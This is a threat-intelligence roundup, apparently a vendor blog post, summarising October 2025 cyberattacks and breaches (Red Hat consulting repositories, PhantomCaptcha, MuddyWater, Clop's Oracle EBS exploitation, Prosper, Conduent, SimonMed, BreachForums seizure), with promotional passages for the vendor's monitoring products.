October 2025: Oracle Exploitation, Red Hat Incident, PhantomCaptcha, and Major Breaches

October 2025 brought forward a mix of high-impact data breaches, targeted intrusion campaigns, and continued activity from well-established threat groups. Several incidents involved extensive data exposure across government, healthcare, and financial services, while others highlighted ongoing interest in enterprise platforms such as Oracle E-Business Suite. Social-engineering-driven operations, including ClickFix-based activity, also remained prevalent throughout the month.

Below is a breakdown of the major cyberattacks seen in October 2025 and the developments that defined last month’s activity.

Crimson Collective Claimed Large-Scale Theft From Red Hat’s Consulting Repositories

The Red Hat incident dominated October 2025 after the Crimson Collective extortion group claimed it had stolen hundreds of gigabytes of data from the company’s consulting GitLab environment.

The group began posting samples on October 1, alleging access to more than 28,000 internal repositories containing consulting engagement materials, Customer Engagement Reports, and configuration files. Listings referenced over 800 organizations, with both major enterprises and U.S. government agencies appearing in the directory samples shared by the attackers.

Red Hat confirmed unauthorized access to a consulting-specific GitLab instance and stated that the breach did not extend to its products, software supply chain, or other internal systems. Investigations indicated the exposed data largely consisted of project documentation and code samples, though attackers asserted they had obtained broader access.

The extortion effort escalated throughout October as Crimson Collective aligned itself with ShinyHunters and Scattered Lapsus$ Hunters and threatened public leaks. By mid-month, the group began advertising what it called the “Red Hat Consulting Backup” dataset for sale, placing a valuation in the hundreds of thousands of dollars. Researchers also connected the group to separate cloud-focused activity targeting AWS environments through exposed access keys and misconfigured IAM policies, signaling a wider campaign beyond the Red Hat intrusion.

Threat actor card of Scattered Lapsus$ Hunters

PhantomCaptcha ClickFix Campaign Targeted Ukraine-Focused Aid and Government Organizations

ClickFix activity continued rising in October 2025, and PhantomCaptcha stood out as a coordinated example of this technique in action. The campaign focused on staff at the International Red Cross, UNICEF, the Norwegian Refugee Council, and several Ukrainian regional administrations. Attackers impersonated the Ukrainian President’s Office and sent an eight-page PDF styled as an official memo.

Opening the file led victims to a fake Zoom page at zoomconference[.]app, where a staged verification prompt guided them into running a PowerShell command. This user-assisted execution allowed the operators to install malware without relying on a traditional exploit.

Researchers noted that the public-facing domains were active for only a day to limit visibility, while backend servers remained online to manage infected systems. Researchers also linked PhantomCaptcha to a related ecosystem distributing Android spyware through deceptive applications.

For insights into the rise of ClickFix techniques in 2025, read SOCRadar’s analysis: “ClickFix & FileFix: How a Copy-Paste Trick Became 2025’s Top Social Engineering Threat”.

MuddyWater Targeted Over 100 Government Entities Using Phoenix v4 Backdoor

Iran’s state-sponsored hacking group MuddyWater returned to prominence with a sweeping espionage campaign that reached more than 100 government and diplomatic organizations across the Middle East and North Africa.

The activity began on August 19, 2025, when the group leveraged a compromised email account to send phishing messages carrying a seemingly routine Word document. Once recipients enabled macros, the file installed the FakeUpdate loader, which then deployed Phoenix v4, an updated version of MuddyWater’s long-used backdoor.

Phoenix v4 allowed the operators to profile systems, maintain persistence, and execute remote commands. Researchers also identified a separate credential-harvesting tool designed to pull browser data from Chrome, Edge, Opera, and Brave. The attackers shut down their initial server infrastructure on August 24, a shift that suggested the operation had moved into a quieter collection phase.

Well-known tooling, familiar code patterns, and consistent regional targeting enabled researchers to link the campaign to the Iranian state-backed group with high confidence.

Clop Ransomware Group Exploited Oracle EBS

Oracle’s October 2025 security alert introduced CVE-2025-61884, a high-severity vulnerability affecting supported versions of Oracle E-Business Suite from 12.2.3 through 12.2.14. Oracle disclosed the issue on October 11, and shortly afterward it was added to CISA’s Known Exploited Vulnerabilities catalog, signaling confirmed in-the-wild abuse.

Quick details of CVE-2025-61884 (SOCRadar LABS, CVE Radar)

Its emergence closely followed earlier EBS exploitation involving CVE-2025-61882, a case also linked to Clop ransomware operations. Researchers noted that leaked exploit code and earlier attacks appeared to accelerate interest in related components, including the UiServlet endpoint now tied to CVE-2025-61884.

Clop continues publishing names of alleged victims connected to Oracle EBS compromises across finance, manufacturing, and professional services, among other sectors.

SOCRadar XTI: Contextual Intelligence for Modern Defense Teams

Modern campaigns often combine exploited vulnerabilities, credential theft, and social-engineering tactics, making it difficult for security teams to keep pace. SOCRadar’s Extended Threat Intelligence (XTI) platform brings these signals together by correlating CVEs, threat actor activity, leaked data, and exploit availability into a single operational view.

With the Cyber Threat Intelligence module, teams can track how vulnerabilities evolve, understand which actors are weaponizing them, and prioritize remediation based on real-world exploitability rather than patch lists alone. The platform’s enrichment feeds, technical reports, and automated alerts help analysts focus on high-impact risks as they emerge.

SOCRadar’s CTI module, Vulnerability Intelligence

For organizations looking to turn scattered intelligence into actionable security decisions, SOCRadar’s CTI provides the context needed to respond faster and stay aligned with evolving attack paths.

Prosper Database Intrusion Exposed Information of More Than 17 Million Accounts

Prosper confirmed that attackers gained access to one of its internal databases and extracted customer and applicant information While the company stated that no customer accounts or funds were accessed, the breach involved confidential and personal data held within Prosper’s systems.

The peer-to-peer lending platform contained the intrusion on September 2 and notified law enforcement shortly afterward.

Although Prosper initially disclosed only that Social Security numbers were among the compromised fields, additional details emerged when Have I Been Pwned ingested the dataset. According to the breach notification service, the stolen information relates to approximately 17.6 million accounts and includes names, physical and email addresses, dates of birth, government identification fields, IP addresses, and financial profile data such as employment status, income, and credit status.

Details of the Prosper data breach (HIBP)

Conduent Data Breach Exposed Sensitive Information of More Than 10.5 Million Individuals

Conduent disclosed in October 2025 that a large-scale data breach stemming from a 2024 compromise affected at least 10.5 million people, based on filings with multiple US state attorneys general.

The company provides business process outsourcing and digital services for government agencies and enterprises, which significantly widened the impact across states. Exposed information varied by individual and may have included names, Social Security numbers (SSNs), dates of birth, health insurance identifiers, and medical details.

Although Conduent stated it had no evidence of misuse as of October 24, 2025, the breach originated from an intrusion traced back to October 21, 2024.

Medusa Ransomware Breach Exposed Data of More Than 1.2 Million SimonMed Patients

SimonMed Imaging reported a significant data breach after the Medusa ransomware group claimed responsibility for an intrusion that resulted in the theft of roughly 200 GB of data.

The provider, one of the largest outpatient imaging networks in the United States, detected suspicious activity on January 28, 2025 following a vendor alert. An internal investigation later confirmed unauthorized access from January 21 through February 5, affecting more than 1.2 million individuals.

The compromised information varied widely and may have included patient demographics, appointment details, diagnostic data, imaging records, insurance information, government identifiers, financial data, and in some cases authentication credentials or biometrics. After containing the intrusion, the organization implemented additional security measures, including password resets, expanded MFA, endpoint monitoring, and reduced third-party access.

Medusa added SimonMed to its leak site and issued a $1 million ransom demand, underscoring continued pressure on healthcare providers facing large-scale data extortion events.

Threat actor card of Medusa Ransomware

BreachForums Seized Again Amid Ongoing Salesforce-Related Extortion Activity

Although not a cyber attack, one of October’s notable developments was the law-enforcement seizure of the latest BreachForums domain.

U.S. and French authorities took down breachforums[.]hn on October 10, targeting a platform that had recently shifted from a forum format to a clearnet leak site used in extortion activity linked to Scattered Lapsus$ Hunters and ShinyHunters, particularly involving Salesforce-related breaches. The seized domain displayed an official notice, while the group’s onion service remained online.

Takedown announcement on the breachforums[.]hn domain.

ShinyHunters acknowledged the takedown in a PGP-signed statement, confirming the loss of infrastructure and historical data but asserting that their broader extortion efforts would continue.

The seizure added to BreachForums’ long cycle of shutdowns and reappearances and underscored increasing law-enforcement pressure on groups relying on public leak portals to amplify their campaigns.

Improve Exposure Awareness With SOCRadar’s Dark Web Monitoring

As threat groups continue to rely on leak portals, Telegram channels, and closed forums to trade data and coordinate extortion, visibility into these spaces has become a critical part of incident preparedness.

SOCRadar’s Dark Web Monitoring continuously reviews these environments for mentions of company assets, leaked credentials, internal documents, or threat actor discussions involving your organization. Security teams receive timely alerts when new material appears, along with context about the actors involved and how the data is being used. This makes it possible to investigate exposures early, verify authenticity, and begin remediation before information spreads more widely.

SOCRadar’s Dark Web Monitoring

For organizations facing growing risks from data theft and extortion operations, SOCRadar’s monitoring capabilities offer a practical way to stay informed about what surfaces online and how it may affect ongoing security efforts.